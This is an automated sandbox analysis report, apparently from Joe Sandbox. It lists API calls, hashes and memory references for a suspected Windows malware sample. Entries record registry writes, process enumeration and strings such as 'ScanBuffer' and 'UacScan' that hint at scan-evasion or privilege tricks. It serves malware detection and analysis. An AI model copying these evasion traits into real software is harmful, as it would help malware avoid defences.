                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                              • API String ID: 3847983778-3852638603
                                                                              • Opcode ID: 614d18f67732b4861a1d60b13a15e6cbfc55e1e40ed90de8c554d592cf890545
                                                                              • Instruction ID: 9cd7704ace4ef35a780880d1a5a7d2b9242089232488f085bf2b3328cb6b4f8d
                                                                              • Opcode Fuzzy Hash: 614d18f67732b4861a1d60b13a15e6cbfc55e1e40ed90de8c554d592cf890545
                                                                              • Instruction Fuzzy Hash: 2641DC31B502099FEF14FBE8C981E9EB3FAAFC9720F655426E441E7250DA75AD018F60
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D04,?,?,02993890,00000001), ref: 02995C18
                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D04,?,?,02993890,00000001), ref: 02995C46
                                                                                • Part of subcall function 02987D20: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02993890,02995C86,00000000,02995D04,?,?,02993890), ref: 02987D6E
                                                                                • Part of subcall function 02987F28: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02993890,02995CA1,00000000,02995D04,?,?,02993890,00000001), ref: 02987F47
                                                                              • GetLastError.KERNEL32(00000000,02995D04,?,?,02993890,00000001), ref: 02995CAB
                                                                                • Part of subcall function 0298A708: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0298C369,00000000,0298C3C3), ref: 0298A727
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                              • String ID:
                                                                              • API String ID: 503785936-0
                                                                              • Opcode ID: b59d34114c4a5885348a5562376ecd49d973512a49dece3785f4deacc62a5850
                                                                              • Instruction ID: cb74d9151821af1824da8e3622d112726d7b0fc73448503b8dfd676bbdbbcfa4
                                                                              • Opcode Fuzzy Hash: b59d34114c4a5885348a5562376ecd49d973512a49dece3785f4deacc62a5850
                                                                              • Instruction Fuzzy Hash: 6831A330A042059FDB01FFA8C8807AEB7F6AF89714F958465D504EB380E7755D04CFA5
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenValue
                                                                              • String ID:
                                                                              • API String ID: 779948276-0
                                                                              • Opcode ID: cb96826fc55f6da032dcc4dfd118426a2d47a025da623bf7b0e2f2ee7d491026
                                                                              • Instruction ID: 0eed5f346fd1cce9cf764e66903d331ea63ef153b3a51503cdd5d3fe7cae2dc4
                                                                              • Opcode Fuzzy Hash: cb96826fc55f6da032dcc4dfd118426a2d47a025da623bf7b0e2f2ee7d491026
                                                                              • Instruction Fuzzy Hash: 3B116D70604205AFEB10FBA8CC81DAE77EDEF89714F845021F504D7290E631ED409F51
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenValue
                                                                              • String ID:
                                                                              • API String ID: 779948276-0
                                                                              • Opcode ID: 8efa11a28cdd145c73fca9018a6003736c76a77056226b0f06eb446bfcb40ec6
                                                                              • Instruction ID: cc3d4871cf924d90c6b6c3499eee5ac9c181b189f9de8f3ff096d9eac7135ece
                                                                              • Opcode Fuzzy Hash: 8efa11a28cdd145c73fca9018a6003736c76a77056226b0f06eb446bfcb40ec6
                                                                              • Instruction Fuzzy Hash: B7116D70604205AFEB10FBA8CC81DAE77EDEF89714F845021F504D7290E631E9409F51
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 6cafc799dc27c6f0afa2dbe4f19224f7ed59cb77a1b683861de74786bf111e4f
                                                                              • Instruction ID: 8d9df720bb580aec71158b07fa84713fb95c9378fa3d7c0a80f885b3d5b3a1bf
                                                                              • Opcode Fuzzy Hash: 6cafc799dc27c6f0afa2dbe4f19224f7ed59cb77a1b683861de74786bf111e4f
                                                                              • Instruction Fuzzy Hash: B4F0C220708610E7CB287B388DE4A7D329A6F8071175C5837B4C79B165DB348C45DB72
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 02984D07
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02984D19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 986138563-0
                                                                              • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                              • Instruction ID: f20bc6507b5635872a751084f5a64943df6217c52f0b5e6b865afa7ee0002ca3
                                                                              • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                              • Instruction Fuzzy Hash: 14E012B81052025EFB143F219C40B7B376EAFC1751F1C5899A904CA150E734C842AE35
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(?), ref: 0299736A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID: H
                                                                              • API String ID: 3341692771-2852464175
                                                                              • Opcode ID: 4e0bdf45087dab059f2b43c07530d6ccf453655273aaf018fb19cf4029e4e1cc
                                                                              • Instruction ID: 3f5341a6ed36ff1074fbc38cb124456b43af6787cfeb9156da88df2317e6e47c
                                                                              • Opcode Fuzzy Hash: 4e0bdf45087dab059f2b43c07530d6ccf453655273aaf018fb19cf4029e4e1cc
                                                                              • Instruction Fuzzy Hash: 15B1D2B4A116089FDB14CF99E480ADDFBF6FF89324F158569E805AB360DB31A845CF50
                                                                              APIs
                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 0298E711
                                                                                • Part of subcall function 0298E2F4: VariantClear.OLEAUT32(?), ref: 0298E303
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopy
                                                                              • String ID:
                                                                              • API String ID: 274517740-0
                                                                              • Opcode ID: d4a06811f5c83fe51b291c3d982e1e1491eb83a3dc3d4756e85ab29040a22950
                                                                              • Instruction ID: 98f56042a955eab6be000c99db4f4db427733a47dd7a170d703c492eb5985e4b
                                                                              • Opcode Fuzzy Hash: d4a06811f5c83fe51b291c3d982e1e1491eb83a3dc3d4756e85ab29040a22950
                                                                              • Instruction Fuzzy Hash: 5B118E2070021097CB34BF79C8E4A6A6BDAAF85710B1C4866F68E9B255EB34CC41CA62
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: ce3faeb2d05742fd514b7fcaa92a58d7e596463218f44db388b90a4143bb1de8
                                                                              • Instruction ID: 549a0124de2967c0534303d617c7a67ab85a9e62fa892cfaa577cd39866c8389
                                                                              • Opcode Fuzzy Hash: ce3faeb2d05742fd514b7fcaa92a58d7e596463218f44db388b90a4143bb1de8
                                                                              • Instruction Fuzzy Hash: 37314F71A04218ABDB50FFA8D898AAA77ACEB4D314F584861F94DD3280D334ED50CB61
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,029DF0C7,?,?,?,?,?), ref: 029DF160
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.00000000029DF000.00000040.00001000.00020000.00000000.sdmp, Offset: 029DF000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_29df000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                              • Instruction ID: 77f7a43f0b6522e2cab20e09586fbfba9088ee1d5d6631c6b6d775dc6b9bfccc
                                                                              • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                              • Instruction Fuzzy Hash: 32F0A476604317DBEB108E55CC5667773ECEE9136970A8828E847EBA01E725E805E7A0
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02996D49,?,?,?,00000000), ref: 02996D29
                                                                                • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeFromProgString
                                                                              • String ID:
                                                                              • API String ID: 4225568880-0
                                                                              • Opcode ID: 7e1318ad9472b452fabf68c7696f137e8d27243566130fb120f19fa6e0c4db50
                                                                              • Instruction ID: 77e2b6c0e40fdaef9c7da33b63faf6afa5d817e19ffcc2382ea382ff8f7dd928
                                                                              • Opcode Fuzzy Hash: 7e1318ad9472b452fabf68c7696f137e8d27243566130fb120f19fa6e0c4db50
                                                                              • Instruction Fuzzy Hash: BFE06D35604308BBEB15FAAACC5199A7BEDDFCAB20B514471A900D3650EA75AE0098A0
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 02985832
                                                                                • Part of subcall function 02985A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985A94
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AB2
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AD0
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985AEE
                                                                                • Part of subcall function 02985A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B37
                                                                                • Part of subcall function 02985A78: RegQueryValueExA.ADVAPI32(?,02985CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001), ref: 02985B55
                                                                                • Part of subcall function 02985A78: RegCloseKey.ADVAPI32(?,02985B84,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B77
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                              • String ID:
                                                                              • API String ID: 2796650324-0
                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction ID: 2fd8d6da8630a9144d9adb226538a5efcd6cccab81c31ba52ddb8e6ccc76cbaf
                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction Fuzzy Hash: B1E06D71A002148BCB10EE5888C0A5637D8AB08750F4A0565EC58DF34AD370DD148BD0
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02987DB8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                              • Instruction ID: b97dcf7e315749c58c63e9ecca67bfbc0375da287b1997dc7b1d0bec4cf8041a
                                                                              • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                              • Instruction Fuzzy Hash: E4D05B763082107AD220A55A6C84EFB9BDCCFC5770F144639F658C7180E7608C01C771
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • Process32First.KERNEL32(?,00000128), ref: 0299A1A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$FirstHandleModuleProcess32
                                                                              • String ID:
                                                                              • API String ID: 2774106396-0
                                                                              • Opcode ID: 496ab0227d67b3f8f2eb7e0cfeef1ba7644353cebb2788ff5cbddc549ed02bc8
                                                                              • Instruction ID: c989b2cc5a20cad747c310a838fd6a933388fea93ad46b982c2e385dcbb78506
                                                                              • Opcode Fuzzy Hash: 496ab0227d67b3f8f2eb7e0cfeef1ba7644353cebb2788ff5cbddc549ed02bc8
                                                                              • Instruction Fuzzy Hash: 90C08CB36426341BAE2066FC2FC88D3978DCD8B1BB30408A3F509D3142D3258C10AAA0
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • Process32Next.KERNEL32(?,00000128), ref: 0299A1C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModuleNextProcess32
                                                                              • String ID:
                                                                              • API String ID: 2237597116-0
                                                                              • Opcode ID: 9e3f6e52fc7b7febf8a6bb0bb87ee47e3c560e41270f93bf8e155e8fa8a014de
                                                                              • Instruction ID: 0df12f92e3a4cdbfc7f520641c6b5e38b5bf807b21324d70d958aa19396d8fc9
                                                                              • Opcode Fuzzy Hash: 9e3f6e52fc7b7febf8a6bb0bb87ee47e3c560e41270f93bf8e155e8fa8a014de
                                                                              • Instruction Fuzzy Hash: DCC08073602524179F1066FC2EC44D3574DCD491B73040C63B519D3101D3154C10D590
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                              • Instruction ID: 596a4291452e0332eae7ee43ab46ea7c8e48f63c7ec4e99e2c3a2ae86eca1247
                                                                              • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                              • Instruction Fuzzy Hash: B2C08CA62022020A1E60B5FC0CC409A42CC098413837C1F29A0B8DE2E3D32288222870
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,?,029A1920,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 02987E4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                              • Instruction ID: 2222901bbff392444782c6299c9d4dc8763a9fcf57482da0a571502800839dc5
                                                                              • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                              • Instruction Fuzzy Hash: 8EC08CA62022000E1E60F1FC4CC059A42CC098553837C2F21E0A9DA2E3D32288522810
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID:
                                                                              • API String ID: 3341692771-0
                                                                              • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                              • Instruction ID: 1ec470d30e98d0caea14b9196eb568acb326d182cc8ace9c735c21974f851a2f
                                                                              • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                              • Instruction Fuzzy Hash: AFC012B260033547EB216A989CC079662CCDF452A5F1C10A1D508D7240E3609C004B65
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              • SysReAllocStringLen.OLEAUT32(029A9B3C,0299D680,000000B4), ref: 02984C62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 344208780-0
                                                                              • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                              • Instruction ID: 2ad5c57609bfabdbc6b3abf92376b56f4dbe3dc0d2d4504af2e6605accce497e
                                                                              • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                              • Instruction Fuzzy Hash: 65D080745001035DAF2CBA554944AB777AE9DD020634CE65DD902CE240F721C801CA31
                                                                              APIs
                                                                              • timeSetEvent.WINMM(00002710,00000000,029A984C,00000000,00000001), ref: 029A9868
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Eventtime
                                                                              • String ID:
                                                                              • API String ID: 2982266575-0
                                                                              • Opcode ID: e8b63d50ecef12d9556c278b3f3bce2b8f2e7949782cf0a95caa7ff12e037266
                                                                              • Instruction ID: 9197b2ce9bb2879890cd21d888c7bc0e4093d5da0f4bba489d66a33abcf2eb8c
                                                                              • Opcode Fuzzy Hash: e8b63d50ecef12d9556c278b3f3bce2b8f2e7949782cf0a95caa7ff12e037266
                                                                              • Instruction Fuzzy Hash: 93C092F07953403EFA10B6A96CD2FB3699DEB84B00F100422B600EE2C3E5E248509E60
                                                                              APIs
                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02984BEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                              • Instruction ID: 7b93f826b1f4703741da9eaef866fd0c81bc7768ec3fb3a1a209e47e9e495387
                                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                              • Instruction Fuzzy Hash: E6B0123C64820358FB5033610D00F7A00CC0F902C7F8C20959E28C80C0FF00C4018833
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02984C03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID:
                                                                              • API String ID: 3341692771-0
